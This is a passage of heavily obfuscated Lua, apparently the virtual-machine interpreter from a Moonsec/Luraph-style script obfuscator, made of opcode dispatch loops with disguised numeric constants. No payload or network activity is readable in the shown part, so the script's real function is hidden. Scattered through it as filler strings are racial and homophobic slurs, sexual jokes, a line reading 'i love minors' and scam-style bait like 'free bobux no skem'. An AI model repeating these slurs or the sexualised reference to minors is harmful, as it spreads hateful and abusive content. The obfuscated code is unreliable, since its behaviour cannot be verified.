o=e[h];local l=n[e[O]];n[o+1]=l;n[o]=l[e[g]];break end while 1271==(l)/((-0x2c+3462))do local l=e[s];local a=e[N];local r=l+2 local l={n[l](n[l+1],n[r])};for e=1,a do n[r+e]=l[e];end;local l=l[1]if l then n[r]=l o=e[x];else o=o+d;end;break end;break;end break;end while 2745==(l)/((3623+(-0x36+-67)))do l=(804384)while a<=(-#[[why 6 hours cooldown to send a meme strings]]+(6480/0x87))do l-= l l=(12475419)while(0x3b-55)<a do l-= l n[e[h]]=n[e[x]][e[D]];break end while(l)/((801002/0xd6))==3333 do n[e[i]][e[O]]=e[B];break end;break;end while 378==(l)/((-0x26+2166))do l=(2015832)while a>((172+-0x6f)-0x37)do l-= l if(n[e[c]]<n[e[B]])then o=o+U;else o=e[u];end;break end while(l)/((0x1035+(-13113/0x8d)))==497 do P[e[u]]=n[e[c]];o=o+d;e=r[o];n[e[h]]={};o=o+d;e=r[o];n[e[w]]={};o=o+d;e=r[o];P[e[O]]=n[e[t]];o=o+d;e=r[o];n[e[c]]=P[e[O]];o=o+d;e=r[o];if(n[e[t]]==e[N])then o=o+U;else o=e[u];end;break end;break;end break;end break;end while 1665==(l)/((-#"Luraph v13 has been released changed absolutely fucking nothing"+(0x50c22/138)))do l=(4002318)while(0x36+-43)>=a do l-= l l=(3474726)while(-#[[brawl stars hard gay porn shelly nsked minecraft gay porn roblox rule34 hot]]+(0x7c+(-#'i love minors'+(-0x160b/209))))>=a do l-= l l=(7809516)while a>(184/0x17)do l-= l local e=e[c];m=e+j-1;for o=e,m do local e=A[o-e];n[o]=e;end;break end while(l)/((-#'niggers'+(344267/0x77)))==2706 do local l=e[h]local r={n[l](M(n,l+1,m))};local o=0;for e=l,e[g]do o=o+d;n[e]=r[o];end break end;break;end while(l)/((4601-0x90e))==1522 do l=(4261552)while a>((0x93-121)+-#'atakan der nigga')do l-= l n[e[s]]=n[e[u]][e[D]];break end while 3209==(l)/(((0x49f0/14)+-#[[keno 0347 is a nerdy fag]]))do n[e[c]]=(e[x]~=0);o=o+U;break end;break;end break;end while 1623==(l)/(((0x73456/190)+-#'Deeznutsbutinlualoo'))do l=(424368)while a<=(-#[[balls]]+(86-0x44))do l-= l l=(4534736)while(0x7f+-115)<a do l-= l if not n[e[s]]then o=o+U;else o=e[f];end;break end while 4078==(l)/((20016/0x12))do for e=e[c],e[x]do n[e]=nil;end;break end;break;end while 1263==(l)/((0x2cf-383))do l=(11761096)while a<=(125-0x6f)do l-= l P[e[b]]=n[e[i]];break;end while 3118==(l)/((0xaa5dc/185))do l=(4919200)while(102+-0x57)<a do l-= l n[e[c]]=n[e[x]];break end while(l)/((-22+(0xe514/27)))==2288 do local l;n[e[i]]=P[e[k]];o=o+d;e=r[o];n[e[t]]=n[e[k]][e[B]];o=o+d;e=r[o];n[e[t]]=n[e[k]];o=o+d;e=r[o];l=e[c]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[i]]();break end;break;end break;end break;end break;end break;end while(l)/((-101+0x523))==364 do l=(2399625)while a<=(1920/(0xff0/51))do l-= l l=(5922624)while a<=((-0x60+155)+-#[[papier ist ein kleiner schwanz lutscher]])do l-= l l=(4656100)while a<=(2070/0x73)do l-= l l=(1000076)while(0x8e-125)<a do l-= l local a;local l;n[e[h]]=n[e[k]];o=o+d;e=r[o];l=e[t];m=l+j-1;for e=l,m do a=A[e-l];n[e]=a;end;o=o+d;e=r[o];l=e[h];do return n[l](M(n,l+1,m))end;o=o+d;e=r[o];l=e[h];do return M(n,l,m)end;o=o+d;e=r[o];do return end;break end while(l)/((39919/0x13))==476 do n[e[t]]=n[e[f]]*e[N];break end;break;end while 1844==(l)/((0xa44+-103))do l=(2238870)while(-#"FranzJPresents"+(3366/0x66))<a do l-= l local l;n[e[t]]=P[e[k]];o=o+d;e=r[o];n[e[w]]=n[e[f]][e[D]];o=o+d;e=r[o];n[e[w]]=e[x];o=o+d;e=r[o];n[e[t]]=e[f];o=o+d;e=r[o];n[e[t]]=e[k];o=o+d;e=r[o];l=e[h]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];n[e[t]][e[O]]=n[e[C]];o=o+d;e=r[o];n[e[s]][e[O]]=e[D];o=o+d;e=r[o];n[e[t]]=P[e[k]];o=o+d;e=r[o];n[e[w]]=n[e[u]][e[S]];break end while 1110==(l)/((0x1013-2098))do if n[e[i]]then o=o+d;else o=e[f];end;break end;break;end break;end while 2616==(l)/((0x11e8-(308560/0x85)))do l=(7323771)while((162-0x78)+-#"Cock and ball tortue")>=a do l-= l l=(724418)while(-0x1c+49)<a do l-= l if(n[e[t]]~=e[S])then o=o+U;else o=e[x];end;break end while 2578==(l)/((0x9e10/144))do local l;P[e[u]]=n[e[s]];o=o+d;e=r[o];n[e[w]]=P[e[O]];o=o+d;e=r[o];n[e[i]]=P[e[u]];o=o+d;e=r[o];l=e[h]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[i]]=n[e[b]][e[B]];o=o+d;e=r[o];n[e[s]]=n[e[u]][e[S]];o=o+d;e=r[o];n[e[h]]=P[e[O]];o=o+d;e=r[o];n[e[c]]=n[e[b]];o=o+d;e=r[o];n[e[c]]=(e[x]~=0);o=o+d;e=r[o];l=e[h]n[l](M(n,l+U,e[f]))break end;break;end while(l)/((-0x7f+3046))==2509 do l=(3146902)while(115-0x5c)<a do l-= l n[e[i]]=n[e[k]]%e[g];break end while(l)/((1853-0x3ab))==3443 do if(n[e[c]]~=e[N])then o=o+U;else o=e[b];end;break end;break;end break;end break;end while 1185==(l)/((-#"Deezbutts"+(-0x54+(-#"moonsec backrooms confirmed"+(0x1127-2246)))))do l=(3797640)while a<=(-#[[function howtofucknicuse print you cant fuck nicuse sorry haha you noooo end]]+(0xe5+-125))do l-= l l=(31464)while((0x90-88)+-#[[impulse was here pastebin reel]])>=a do l-= l l=(5924328)while(0x43-42)<a do l-= l n[e[w]]=y[e[u]];o=o+d;e=r[o];n[e[w]]=n[e[u]][e[B]];o=o+d;e=r[o];n[e[h]]=n[e[x]][e[S]];o=o+d;e=r[o];n[e[i]][e[u]]=e[C];o=o+d;e=r[o];do return end;break end while 3837==(l)/((-25+0x621))do local o=e[i]n[o]=n[o](M(n,o+d,e[k]))break end;break;end while 1311==(l)/((-#'ur mom is hot'+(0x7a+-85)))do l=(1448446)while a>((190-0x8f)+-#'get good use moonsec')do l-= l if(n[e[w]]==n[e[g]])then o=o+U;else o=e[f];end;break end while 811==(l)/(((0x20a56/74)+-#'impulse loves moonsex'))do local l;n[e[t]][e[b]]=n[e[N]];o=o+d;e=r[o];n[e[w]]=P[e[k]];o=o+d;e=r[o];n[e[c]]=n[e[b]][e[B]];o=o+d;e=r[o];n[e[s]]=e[x];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];n[e[h]]=e[O];o=o+d;e=r[o];l=e[w]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];n[e[t]][e[f]]=n[e[B]];o=o+d;e=r[o];n[e[t]][e[O]]=e[B];o=o+d;e=r[o];n[e[w]]=P[e[O]];o=o+d;e=r[o];n[e[c]]=n[e[x]][e[D]];o=o+d;e=r[o];n[e[h]]=e[b];o=o+d;e=r[o];n[e[c]]=e[k];o=o+d;e=r[o];n[e[s]]=e[f];o=o+d;e=r[o];n[e[c]]=e[u];o=o+d;e=r[o];l=e[t]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];n[e[w]][e[u]]=n[e[C]];o=o+d;e=r[o];n[e[w]]=P[e[b]];o=o+d;e=r[o];n[e[w]]=n[e[b]][e[S]];o=o+d;e=r[o];n[e[i]]=e[O];o=o+d;e=r[o];n[e[t]]=e[b];o=o+d;e=r[o];n[e[s]]=e[x];o=o+d;e=r[o];n[e[t]]=e[k];o=o+d;e=r[o];l=e[w]n[l]=n[l](M(n,l+d,e[u]))o=o+d;e=r[o];n[e[s]][e[O]]=n[e[B]];o=o+d;e=r[o];n[e[h]]=P[e[O]];o=o+d;e=r[o];n[e[s]]=n[e[b]][e[D]];o=o+d;e=r[o];n[e[h]]=n[e[b]][e[C]];o=o+d;e=r[o];n[e[h]][e[b]]=n[e[D]];o=o+d;e=r[o];n[e[t]][e[u]]=e[S];o=o+d;e=r[o];n[e[w]]=P[e[u]];o=o+d;e=r[o];n[e[i]]=n[e[b]][e[B]];o=o+d;e=r[o];n[e[t]]=e[x];o=o+d;e=r[o];n[e[s]]=e[f];o=o+d;e=r[o];n[e[i]]=e[b];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];n[e[t]][e[k]]=n[e[B]];o=o+d;e=r[o];n[e[w]][e[x]]=e[N];o=o+d;e=r[o];n[e[w]][e[u]]=e[N];o=o+d;e=r[o];n[e[t]][e[u]]=e[C];o=o+d;e=r[o];n[e[t]][e[u]]=e[C];o=o+d;e=r[o];n[e[h]][e[O]]=n[e[g]];o=o+d;e=r[o];n[e[t]]=P[e[x]];o=o+d;e=r[o];n[e[i]]=n[e[b]][e[C]];o=o+d;e=r[o];n[e[s]]=e[k];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];n[e[s]]=e[f];o=o+d;e=r[o];l=e[t]n[l]=n[l](M(n,l+d,e[k]))o=o+d;e=r[o];n[e[c]][e[f]]=n[e[D]];o=o+d;e=r[o];n[e[t]]=P[e[f]];o=o+d;e=r[o];n[e[t]]=n[e[u]][e[g]];o=o+d;e=r[o];n[e[s]]=e[f];o=o+d;e=r[o];n[e[t]]=e[O];o=o+d;e=r[o];n[e[c]]=e[k];o=o+d;e=r[o];n[e[i]]=e[k];o=o+d;e=r[o];l=e[t]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];n[e[h]][e[f]]=n[e[S]];o=o+d;e=r[o];n[e[t]]=P[e[f]];o=o+d;e=r[o];n[e[w]]=n[e[k]][e[B]];o=o+d;e=r[o];n[e[t]]=e[b];o=o+d;e=r[o];n[e[c]]=e[k];o=o+d;e=r[o];n[e[t]]=e[k];o=o+d;e=r[o];n[e[t]]=e[b];o=o+d;e=r[o];l=e[h]n[l]=n[l](M(n,l+d,e[u]))o=o+d;e=r[o];n[e[s]][e[f]]=n[e[D]];o=o+d;e=r[o];n[e[i]]=P[e[f]];o=o+d;e=r[o];n[e[h]]=n[e[u]][e[B]];o=o+d;e=r[o];n[e[h]]=n[e[b]][e[S]];o=o+d;e=r[o];n[e[w]][e[u]]=n[e[C]];o=o+d;e=r[o];n[e[t]][e[k]]=e[N];o=o+d;e=r[o];n[e[i]]=P[e[f]];o=o+d;e=r[o];n[e[s]]=n[e[k]][e[g]];o=o+d;e=r[o];n[e[i]]=e[O];o=o+d;e=r[o];n[e[c]]=e[x];o=o+d;e=r[o];n[e[w]]=e[O];o=o+d;e=r[o];l=e[h]n[l]=n[l](M(n,l+d,e[u]))o=o+d;e=r[o];n[e[i]][e[u]]=n[e[C]];o=o+d;e=r[o];n[e[h]][e[O]]=e[B];o=o+d;e=r[o];n[e[c]][e[k]]=e[D];o=o+d;e=r[o];n[e[w]][e[u]]=n[e[B]];break end;break;end break;end while(l)/((391160/0x7f))==1233 do l=(332469)while a<=(-#[[MoonsecV2 deobfuscator 2020 free 100 percent]]+(185+-0x6f))do l-= l l=(2523900)while(166-0x89)<a do l-= l local l;local t;local a;n[e[i]]=n[e[u]][e[g]];o=o+d;e=r[o];n[e[i]]=y[e[b]];o=o+d;e=r[o];n[e[h]]=n[e[x]][e[N]];o=o+d;e=r[o];a=e[w]t={n[a](M(n,a+1,e[u]))};l=0;for e=a,e[B]do l=l+d;n[e]=t[l];end o=o+d;e=r[o];if not n[e[c]]then o=o+U;else o=e[b];end;break end while 705==(l)/((-53+0xe31))do local l;n[e[c]]=P[e[b]];o=o+d;e=r[o];n[e[s]]=n[e[O]][e[g]];o=o+d;e=r[o];n[e[c]]=n[e[b]];o=o+d;e=r[o];l=e[c]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[c]]();break end;break;end while 123==(l)/((0xa8f/1))do l=(4301720)while(0x43d/35)>=a do l-= l local o=e[c];do return n[o](M(n,o+1,e[b]))end;break;end while(l)/((-#"warboy hates you"+(1796+(0x4b-92))))==2440 do l=(4759983)while(0xa3-(-#'free pornhub premium'+(429-0x116)))<a do l-= l n[e[i]]={};break end while(l)/((3568-0x70f))==2703 do local e=e[h]local l,o=p(n[e](n[e+U]))m=o+e-d local o=0;for e=e,m do o=o+d;n[e]=l[o];end;break end;break;end break;end break;end break;end break;end break;end while(l)/((-#"Deeznutsbutinlualoo"+(0xce0-1707)))==2268 do l=(3268760)while(-#[[Fucking Retarted]]+(213-0x93))>=a do l-= l l=(5415020)while a<=(174-0x85)do l-= l l=(946449)while a<=((0xc8-143)+-#"Cock and ball tortue")do l-= l l=(609168)while a<=((0x58d/29)+-#"freerobuxphone")do l-= l l=(5890500)while a>(194-0xa0)do l-= l n[e[i]][e[k]]=n[e[N]];break end while(l)/((0x10cf-2161))==2750 do local a;local l;n[e[i]]=P[e[u]];o=o+d;e=r[o];n[e[h]]=n[e[u]][e[B]];o=o+d;e=r[o];n[e[i]]=e[u];o=o+d;e=r[o];n[e[w]]=y[e[k]];o=o+d;e=r[o];l=e[t]n[l]=n[l](M(n,l+d,e[O]))o=o+d;e=r[o];n[e[h]]=n[e[f]][e[S]];o=o+d;e=r[o];n[e[c]]=n[e[x]][e[D]];o=o+d;e=r[o];n[e[s]]=n[e[u]][e[D]];o=o+d;e=r[o];n[e[s]]=(e[b]~=0);o=o+d;e=r[o];n[e[s]]=n[e[k]][e[B]];o=o+d;e=r[o];n[e[c]]=n[e[x]][e[D]];o=o+d;e=r[o];l=e[s];a=n[e[f]];n[l+1]=a;n[l]=a[e[B]];break end;break;end while(l)/((1265-0x2a5))==1036 do l=(816930)while a>(0x95-113)do l-= l n[e[c]][e[u]]=n[e[C]];break end while 435==(l)/((-#'pls free synapse x i am gamer girl uwu'+(2017+-0x65)))do n[e[h]]=n[e[u]][n[e[S]]];break end;break;end break;end while 747==(l)/(((2697-0x56a)+-#'MoonsecV2 deobfuscator 2020 free 100 percent'))do l=(5639720)while a<=(0x1f3b/205)do l-= l l=(212872)while a>(0x1ee0/208)do l-= l local o=e[c]n[o](M(n,o+U,e[b]))break end while(l)/((0x1f4cf/(0x2d22/218)))==88 do local e=e[h]n[e]=n[e](M(n,e+d,m))break end;break;end while(l)/((2851+((-0x68+35)+-#"deadphonelua")))==2036 do l=(8346084)while a>(-#[[i fucked your dad]]+(0xa2-105))do l-= l local e={n,e};e[U][e[_][t]]=e[d][e[_][g]]+e[U][e[_][f]];break end while(l)/((4999-0x9d6))==3364 do local e=e[h]n[e](n[e+U])break end;break;end break;end break;end while 3530==(l)/((-#"ÑÑÑÑÑÑÑ"+(0xc6b-1638)))do l=(2774315)while(114-0x45)>=a do l-= l l=(2623140)while a<=(-#[[testpsx dupe no scam legit 2022 free no virus]]+(-0x50+168))do l-= l l=(1470300)while a>(61+-0x13)do l-= l do return end;break end while(l)/((-#[[free bobux no skem]]+(198128/0x74)))==870 do local o=e[w]n[o](M(n,o+U,e[u]))break end;break;end while(l)/((-101+0x62f))==1770 do l=(11693076)while((-0x74+180)+-#[[get good use moonsec]])<a do l-= l n[e[c]]=n[e[f]]*e[B];break end while(l)/((6400-0xca6))==3698 do local a;local U;local l;n[e[h]]=P[e[k]];o=o+d;e=r[o];n[e[h]]=n[e[b]][e[N]];o=o+d;e=r[o];n[e[c]]=e[x];o=o+d;e=r[o];n[e[s]]=y[e[b]];o=o+d;e=r[o];l=e[h]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];n[e[h]]=n[e[u]][e[S]];o=o+d;e=r[o];n[e[s]]=e[k];o=o+d;e=r[o];n[e[w]]=P[e[f]];o=o+d;e=r[o];n[e[s]]=n[e[b]][e[g]];o=o+d;e=r[o];n[e[i]]=n[e[u]][e[C]];o=o+d;e=r[o];n[e[s]]=n[e[x]][e[N]];o=o+d;e=r[o];U=e[O];a=n[U]for e=U+1,e[N]do a=a..n[e];end;n[e[t]]=a;o=o+d;e=r[o];n[e[t]][e[O]]=n[e[N]];o=o+d;e=r[o];do return end;break end;break;end break;end while(l)/(((-41+0x8cb)+-#'how to find my dad at the dollar store getting milk'))==1285 do l=(1825420)while(0xa3+-116)>=a do l-= l l=(53172)while((166+-0x74)+-#[[yeet]])<a do l-= l n[e[i]]();break end while(l)/(((2635+-0x53)+-#"Impulse youtube real"))==21 do n[e[c]]=n[e[b]]-n[e[B]];break end;break;end while(l)/(((1206-0x28b)+-#"get good use moonsec"))==3412 do l=(14240960)while(-24+0x48)>=a do l-= l n[e[h]][e[f]]=e[S];break;end while(l)/((3836+-0x10))==3728 do l=(9899320)while(156-0x6b)<a do l-= l local l;n[e[c]]=n[e[f]][e[B]];o=o+d;e=r[o];n[e[i]]=y[e[x]];o=o+d;e=r[o];n[e[t]]=n[e[x]][e[B]];o=o+d;e=r[o];n[e[i]]=y[e[O]];o=o+d;e=r[o];n[e[s]]=n[e[f]][e[N]];o=o+d;e=r[o];l=e[w]n[l]=n[l](M(n,l+d,e[f]))o=o+d;e=r[o];n[e[h]]=P[e[k]];o=o+d;e=r[o];n[e[i]]=n[e[x]][e[D]];o=o+d;e=r[o];n[e[i]]=n[e[u]][e[B]];o=o+d;e=r[o];n[e[i]]=n[e[k]][e[g]];o=o+d;e=r[o];l=e[h]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];n[e[h]]=n[e[O]]-n[e[D]];o=o+d;e=r[o];n[e[s]]=n[e[b]][e[S]];o=o+d;e=r[o];if(n[e[h]]<n[e[N]])then o=o+U;else o=e[b];end;break end while(l)/(((0x32ad2/55)+-#"IP grabbed"))==2630 do if(n[e[i]]==e[C])then o=o+U;else o=e[x];end;break end;break;end break;end break;end break;end break;end while 1012==(l)/((-#'nigglet'+(-0x16+3259)))do l=(8858688)while((0x16c-238)+-0x43)>=a do l-= l l=(2643746)while a<=(-16+0x46)do l-= l l=(1240512)while a<=(0x2804/197)do l-= l l=(7093944)while a>(-0x45+120)do l-= l local a;local l;P[e[b]]=n[e[t]];o=o+d;e=r[o];n[e[t]]=P[e[k]];o=o+d;e=r[o];n[e[t]]=n[e[f]][e[N]];o=o+d;e=r[o];n[e[i]]=P[e[f]];o=o+d;e=r[o];n[e[s]]=n[e[x]][e[g]];o=o+d;e=r[o];n[e[i]]=P[e[O]];o=o+d;e=r[o];n[e[c]]=e[x];o=o+d;e=r[o];l=e[w]n[l]=n[l](M(n,l+d,e[O]))o=o+d;e=r[o];n[e[c]]=n[e[k]][e[g]];o=o+d;e=r[o];l=e[s];a=n[e[u]];n[l+1]=a;n[l]=a[e[C]];break end while 4056==(l)/((-#"you get no absolute bitches"+(-89+0x749)))do local h=v[e[b]];local a;local l={};a=H({},{__index=function(o,e)local e=l[e];return e[1][e[2]];end,__newindex=function(n,e,o)local e=l[e]e[1][e[2]]=o;end;});for d=1,e[N]do o=o+U;local e=r[o];if e[(0xb8/184)]==98 then l[d-1]={n,e[k]};else l[d-1]={y,e[u]};end;I[#I+1]=l;end;n[e[i]]=z(h,a,P);break end;break;end while(l)/(((194250/0x6f)-898))==1456 do l=(6030415)while(-#[[paidlancer]]+(156+(-11253/0x79)))<a do l-= l local i;local a;local l;n[e[t]]=e[f];o=o+d;e=r[o];n[e[s]]=e[O];o=o+d;e=r[o];n[e[h]]=#n[e[k]];o=o+d;e=r[o];n[e[h]]=e[f];o=o+d;e=r[o];l=e[w];a=n[l]i=n[l+2];if(i>0)then if(a>n[l+1])then o=e[x];else n[l+3]=a;end elseif(a<n[l+1])then o=e[u];else n[l+3]=a;end break end while(l)/((0x9b1+-64))==2495 do local o=e[s];do return n[o](M(n,o+1,e[u]))end;break end;break;end break;end while 1018==(l)/((5249-0xa5c))do l=(1458344)while a<=(0x11b8/81)do l-= l l=(1796016)while a>(0x56+-31)do l-= l local a;local _,f;local l;n[e[h]]=n[e[x]][e[C]];o=o+d;e=r[o];n[e[i]]=y[e[u]];o=o+d;e=r[o];n[e[i]]=n[e[b]][e[B]];o=o+d;e=r[o];n[e[i]]=n[e[x]][e[D]];o=o+d;e=r[o];n[e[w]]=n[e[k]][e[S]];o=o+d;e=r[o];n[e[h]]=n[e[k]][e[D]];o=o+d;e=r[o];n[e[w]]=n[e[O]][e[B]];o=o+d;e=r[o];n[e[t]]=y[e[x]];o=o+d;e=r[o];n[e[i]]=n[e[x]][e[S]];o=o+d;e=r[o];n[e[i]]=n[e[O]][e[S]];o=o+d;e=r[o];n[e[w]]=n[e[x]]-n[e[D]];o=o+d;e=r[o];n[e[c]]=n[e[O]][e[g]];o=o+d;e=r[o];n[e[t]]=n[e[x]]*e[D];o=o+d;e=r[o];l=e[t]n[l]=n[l](M(n,l+d,e[O]))o=o+d;e=r[o];n[e[w]][e[x]]=n[e[C]];o=o+d;e=r[o];n[e[c]]=y[e[x]];o=o+d;e=r[o];n[e[i]]=n[e[b]];o=o+d;e=r[o];n[e[s]]=P[e[O]];o=o+d;e=r[o];n[e[i]]=n[e[x]];o=o+d;e=r[o];l=e[s]_,f=p(n[l](n[l+U]))m=f+l-d a=0;for e=l,m do a=a+d;n[e]=_[a];end;o=o+d;e=r[o];l=e[c];do return n[l](M(n,l+1,m))end;o=o+d;e=r[o];l=e[c];do return M(n,l,m)end;break end while(l)/(((-124+0x2a7)+-#[[10 black dicks in your mouth]]))==3408 do local o=e[h]local l,e=p(n[o](M(n,o+1,e[b])))m=e+o-1 local e=0;for o=o,m do e=e+d;n[o]=l[e];end;break end;break;end while(l)/(((0x1b99-3578)+-#[[how do i get moonsex v3]]))==421 do l=(1215740)while a<=(149-0x5c)do l-= l local a;local l;n[e[i]]=P[e[u]];o=o+d;e=r[o];n[e[i]]=n[e[x]][e[S]];o=o+d;e=r[o];n[e[w]]=e[b];o=o+d;e=r[o];n[e[w]]=y[e[x]];o=o+d;e=r[o];l=e[i]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];n[e[c]]=n[e[u]][e[N]];o=o+d;e=r[o];n[e[w]]=n[e[b]][e[C]];o=o+d;e=r[o];n[e[i]]=n[e[f]][e[B]];o=o+d;e=r[o];n[e[s]]=n[e[x]][e[C]];o=o+d;e=r[o];n[e[c]]=n[e[b]][e[N]];o=o+d;e=r[o];n[e[w]]=n[e[b]][e[D]];o=o+d;e=r[o];l=e[h];a=n[e[O]];n[l+1]=a;n[l]=a[e[g]];break;end while(l)/(((514+-0x77)+-#[[papier ist ein kleiner schwanz lutscher]]))==3415 do l=(10168092)while(0x8d-83)<a do l-= l local o=e[i]local r={n[o](M(n,o+1,e[f]))};local l=0;for e=o,e[D]do l=l+d;n[e]=r[l];end break end while 3804==(l)/((0x14fb-2698))do n[e[w]]=e[O];break end;break;end break;end break;end break;end while(l)/((-#[[how do i get moonsex v3]]+(0x56126/110)))==2784 do l=(5460868)while a<=((((17833+-0x49)+-#"cilertedcool")/174)+-#'papier ist ein kleiner schwanz lutscher')do l-= l l=(759905)while a<=(0xd3-150)do l-= l l=(6256296)while a>((0xa3-91)+-#'Lana Rhoades')do l-= l y[e[x]]=n[e[c]];break end while(l)/((-50+0x8ea))==2803 do local l;n[e[s]]=n[e[x]];o=o+d;e=r[o];n[e[t]]=n[e[O]];o=o+d;e=r[o];l=e[h];do return n[l](M(n,l+1,e[O]))end;o=o+d;e=r[o];l=e[s];do return M(n,l,m)end;o=o+d;e=r[o];do return end;break end;break;end while 421==(l)/((3698-0x765))do l=(2906475)while(11098/0xb3)<a do l-= l if(n[e[h]]==e[C])then o=o+U;else o=e[f];end;break end while(l)/((-78+0xe11))==825 do local e=e[s];local o=n[e];for e=e+1,m do F(o,n[e])end;break end;break;end break;end while(l)/((0xb2a-1444))==3862 do l=(135138)while(218-(-0x5c+245))>=a do l-= l l=(10776768)while a>(-#"alivephoneluaLMAO"+(122+-0x29))do l-= l local e=e[t];m=e+j-1;for o=e,m do local e=A[o-e];n[o]=e;end;break end while 2738==(l)/((7896-0xf78))do local l;n[e[i]]=n[e[b]][e[S]];o=o+d;e=r[o];n[e[w]]=n[e[O]][e[C]];o=o+d;e=r[o];n[e[s]]=e[b];o=o+d;e=r[o];l=e[t]n[l]=n[l](M(n,l+d,e[k]))o=o+d;e=r[o];if n[e[s]]then o=o+d;else o=e[O];end;break end;break;end while 669==(l)/((-#'Lana Rhoades'+(0x85c0/(-120+0x118))))do l=(11956832)while a<=(250-0xb8)do l-= l n[e[h]]=z(v[e[u]],nil,P);break;end while(l)/((0x34be8/55))==3044 do l=(3786678)while(-#"Obfuscated By Obamas Left Nut"+(0x2be0/117))<a do l-= l local e=e[s];do return M(n,e,m)end;break end while 1722==(l)/((0x20364/60))do n[e[i]][n[e[u]]]=n[e[N]];break end;break;end break;end break;end break;end break;end break;end break;end while(l)/(((0x641-855)+-#"ÑÑÑÑÑÑÑ"))==324 do l=(3720824)while(183+-0x51)>=a do l-= l l=(7773987)while a<=(-0x7c+209)do l-= l l=(185866)while a<=((-93+0x439)/0xd)do l-= l l=(5794240)while(4680/0x41)>=a do l-= l l=(10898550)while(242-0xac)>=a do l-= l l=(2045446)while a>(-#'0nly 1337'+(228-0x96))do l-= l local e=e[i]n[e]=n[e](M(n,e+d,m))break end while 521==(l)/((-#"waste of sperm"+(0xc43b0/204)))do n[e[h]]=#n[e[x]];break end;break;end while 3726==(l)/((40950/0xe))do l=(4882647)while a>(0x545/(61-0x2a))do l-= l local l;n[e[t]]=P[e[O]];o=o+d;e=r[o];n[e[s]]=n[e[b]][e[B]];o=o+d;e=r[o];n[e[h]]=n[e[k]];o=o+d;e=r[o];l=e[w]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[w]]();break end while 1771==(l)/((2798+-0x29))do do return n[e[s]]end break end;break;end break;end while(l)/((-#[[Crackzzzz]]+((-0x2cec/230)+1965)))==3040 do l=(11941824)while(92+-0x12)>=a do l-= l l=(2788562)while a>(-#"i love minors"+(0xc8-114))do l-= l local l=e[b];local o=n[l]for e=l+1,e[D]do o=o..n[e];end;n[e[s]]=o;break end while 2863==(l)/(((1034+-0x1d)+-#"Boosted moonsec for meme string"))do n[e[s]]=(e[f]~=0);break end;break;end while(l)/((-#'10 black dicks in your mouth'+(0x1c15-3609)))==3362 do l=(9324250)while a>((125+-0x14)+-#'testing this thingy lololollez')do l-= l local e=e[t]n[e]=n[e](n[e+U])break end while 2470==(l)/((7663-0xf30))do n[e[c]]=P[e[k]];break end;break;end break;end break;end while 934==(l)/((-0x47+270))do l=(15940080)while a<=(720/0x9)do l-= l l=(3732400)while a<=(5928/0x4c)do l-= l l=(1029500)while(0x66+-25)<a do l-= l local l;n[e[i]]=e[k];o=o+d;e=r[o];n[e[i]]=e[k];o=o+d;e=r[o];n[e[t]]=e[x];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[u]))o=o+d;e=r[o];n[e[h]][e[k]]=n[e[D]];o=o+d;e=r[o];n[e[s]]=P[e[x]];o=o+d;e=r[o];n[e[h]]=n[e[f]][e[S]];o=o+d;e=r[o];n[e[i]]=e[x];o=o+d;e=r[o];n[e[c]]=e[O];o=o+d;e=r[o];n[e[c]]=e[u];break end while 710==(l)/((0xb88-((0xc36-1600)+-#'moonsec got deobfuscated')))do local e=e[w]n[e]=n[e]()break end;break;end while 2480==(l)/(((3064-0x607)+-#"Shrimps was here"))do l=(3253500)while(-0x46+149)<a do l-= l if(n[e[c]]~=n[e[D]])then o=o+U;else o=e[k];end;break end while(l)/((0x1346-2524))==1350 do if(n[e[h]]<n[e[S]])then o=o+U;else o=e[b];end;break end;break;end break;end while(l)/(((0xc5e72/(35638/0xad))+-#[[balls]]))==4056 do l=(4983187)while(0xc9-119)>=a do l-= l l=(8958425)while(-#'keno 0347 is a nerdy fag'+(0x130-199))<a do l-= l local l=e[i]local r={n[l](M(n,l+1,m))};local o=0;for e=l,e[g]do o=o+d;n[e]=r[o];end break end while(l)/(((3730+(0x5+-105))+-#"cilerteddoesntlikeburgers"))==2485 do n[e[w]]=n[e[x]][n[e[N]]];break end;break;end while 4009==(l)/((1362+-0x77))do l=(1694115)while(-#[[holy shit]]+(0x23f0/100))>=a do l-= l local e=e[c]n[e]=n[e](n[e+U])break;end while(l)/((4085+-0x50))==423 do l=(3378803)while a>(191-0x6b)do l-= l local a;local l;n[e[i]]=P[e[f]];o=o+d;e=r[o];n[e[i]]=n[e[b]][e[C]];o=o+d;e=r[o];n[e[i]]=e[f];o=o+d;e=r[o];n[e[i]]=y[e[f]];o=o+d;e=r[o];l=e[i]n[l]=n[l](M(n,l+d,e[O]))o=o+d;e=r[o];n[e[c]]=n[e[b]][e[D]];o=o+d;e=r[o];n[e[i]]=n[e[x]][e[N]];o=o+d;e=r[o];l=e[w];a=n[e[x]];n[l+1]=a;n[l]=a[e[D]];break end while 1723==(l)/((4044-0x823))do n[e[c]]=#n[e[k]];break end;break;end break;end break;end break;end break;end while(l)/((-#'I have stolen your father figure and all your milk muahahahahahaha'+(0x513cc/156)))==3761 do l=(3256800)while(14880/0xa0)>=a do l-= l l=(14905101)while a<=(0xc6-109)do l-= l l=(34500)while a<=(0x6e+-23)do l-= l l=(2702284)while((0xba+-85)+-#"W4rboy was here")<a do l-= l n[e[w]]=(e[u]~=0);o=o+U;break end while 4082==(l)/((0x2c8+-50))do local r=e[t];local a=e[D];local l=r+2 local r={n[r](n[r+1],n[l])};for e=1,a do n[l+e]=r[e];end;local r=r[1]if r then n[l]=r o=e[O];else o=o+d;end;break end;break;end while(l)/((-#"fix vg hub dekudimz"+(23380/0x14)))==30 do l=(7271832)while(-#[[ur mom is hot]]+(0x47ce/182))<a do 